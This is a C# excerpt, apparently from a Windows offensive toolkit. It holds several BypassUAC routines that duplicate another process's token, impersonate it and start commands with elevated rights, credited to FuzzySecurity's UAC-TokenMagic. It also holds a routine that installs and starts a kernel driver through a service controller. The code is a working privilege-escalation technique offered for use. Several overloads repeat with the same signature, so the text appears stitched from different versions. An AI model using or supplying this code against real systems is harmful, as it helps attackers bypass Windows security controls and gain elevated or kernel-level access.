////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
public Boolean BypassUAC(IntPtr htoken, String command)
{
phNewToken = htoken;
if (SetTokenInformation())
{
if (ImpersonateUser())
{
String arguments = "";
if (command.Contains(' '))
{
String[] commandAndArguments = command.Split(new String[] { " " }, StringSplitOptions.RemoveEmptyEntries);
command = commandAndArguments.First();
arguments = String.Join(" ", commandAndArguments.Skip(1).Take(commandAndArguments.Length - 1).ToArray());
}
if (CreateProcess.CreateProcessWithLogonW(phNewToken, command, arguments))
{
advapi32.RevertToSelf();
return(true);
}
}
advapi32.RevertToSelf();
}
return(false);
}
////////////////////////////////////////////////////////////////////////////////
//https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
////////////////////////////////////////////////////////////////////////////////
public void BypassUAC(Int32 processId, String command)
{
Console.WriteLine(" [+] Running as: " + WindowsIdentity.GetCurrent().Name);
GetPrimaryToken((UInt32)processId);
SetTokenInformation();
ImpersonateUser();
CreateProcess.CreateProcessWithLogonW(phNewToken, command, "");
}
////////////////////////////////////////////////////////////////////////////////
//https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
////////////////////////////////////////////////////////////////////////////////
public Boolean BypassUAC(Int32 processId, String command)
{
if (GetPrimaryToken((UInt32)processId))
{
if (SetTokenInformation())
{
if (ImpersonateUser())
{
if (CreateProcess.CreateProcessWithLogonW(phNewToken, command, ""))
{
advapi32.RevertToSelf();
return(true);
}
}
advapi32.RevertToSelf();
}
}
return(false);
}
////////////////////////////////////////////////////////////////////////////////
//https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
////////////////////////////////////////////////////////////////////////////////
public Boolean BypassUAC(Int32 processId, String command)
{
if (GetPrimaryToken((UInt32)processId))
{
if (SetTokenInformation())
{
if (ImpersonateUser())
{
String arguments = String.Empty;
FindExe(ref command, out arguments);
if (CreateProcess.CreateProcessWithLogonW(phNewToken, command, arguments))
{
advapi32.RevertToSelf();
return(true);
}
}
advapi32.RevertToSelf();
}
}
return(false);
}
////////////////////////////////////////////////////////////////////////////////
// sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel
////////////////////////////////////////////////////////////////////////////////
private static void _InstallDriver(CommandLineParsing cLP)
{
//string servicename = Misc.NextItem(ref command);
//string path = Misc.NextItem(ref command);
//string force = Misc.NextItem(ref command);
string serviceName = "TokenDriver";
string sn;
if (cLP.GetData("ServiceName", out sn))
{
serviceName = sn;
}
string path = string.Empty;
string p;
if (cLP.GetData("Path", out p))
{
path = (string)p;
}
bool overwrite = false;
object f;
if (cLP.GetData("Force", out f))
{
overwrite = true;
}
Console.WriteLine("[*] Service Name: " + serviceName);
Console.WriteLine("[*] Service Path: " + path);
PSExec psexec = new PSExec(serviceName);
if (!psexec.Connect("."))
{
Console.WriteLine("[-] Unable to connect to service controller");
return;
}
string filename;
try
{
filename = Path.GetFullPath(path);
}
catch (Exception ex)
{
if (ex is ArgumentException)
{
filename = CreateProcess.FindFilePath(path);
if (string.IsNullOrEmpty(filename))
{
Console.WriteLine("[-] Unable to locate service binary");
return;
}
}
else
{
return;
}
}
Console.WriteLine("[*] Full Path: " + filename);
if (!File.Exists(filename))
{
Console.WriteLine("[-] Unable to find service binary: {0}");
return;
}
if (!psexec.Open())
{
if (!psexec.CreateDriver(filename, overwrite))
{
return;
}
if (!psexec.Open())
{
return;
}
}
if (!psexec.Start())
{
return;
}
}
